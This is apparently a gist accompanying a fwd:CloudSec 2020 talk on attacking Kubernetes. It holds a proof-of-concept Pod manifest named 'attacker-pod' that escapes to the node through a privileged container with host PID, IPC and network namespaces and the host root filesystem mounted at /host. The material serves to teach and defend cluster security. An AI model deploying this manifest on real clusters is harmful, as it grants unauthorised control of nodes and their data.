Kubernetes From an Attacker's Perspective
Originally published as part of talk given at fwd:CloudSec 2020
Slides
Video
Proof of Concept
The following PodSpec was used to demonstrate Pod escape to access node using hostPath volume mount.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| apiVersion: v1 | |
| kind: Pod | |
| metadata: | |
| labels: | |
| run: attacker-pod | |
| name: attacker-pod | |
| spec: | |
| hostPID: true | |
| hostIPC: true | |
| hostNetwork: true | |
| volumes: | |
| - name: host-fs | |
| hostPath: | |
| path: / | |
| containers: | |
| - image: ubuntu | |
| name: attacker-pod | |
| command: ["/bin/sh", "-c", "sleep infinity"] | |
| securityContext: | |
| privileged: true | |
| allowPrivilegeEscalation: true | |
| volumeMounts: | |
| - name: host-fs | |
| mountPath: /host | |
| restartPolicy: Never | |